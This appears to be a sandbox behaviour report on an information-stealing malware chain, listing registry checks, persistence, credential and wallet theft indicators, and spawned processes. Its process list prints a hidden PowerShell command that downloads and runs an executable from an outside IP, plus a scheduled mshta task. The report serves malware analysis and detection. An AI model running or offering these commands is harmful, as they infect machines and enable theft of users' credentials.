| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\db4b761fdf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\db4b761fdf.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4592 set thread context of 4008 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 4400 set thread context of 2468 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 836 set thread context of 3748 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4932 set thread context of 1876 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848779747409536" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe
"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe
"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4592 -ip 4592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 152
C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe
"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"
C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
"C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd14fecc40,0x7ffd14fecc4c,0x7ffd14fecc58
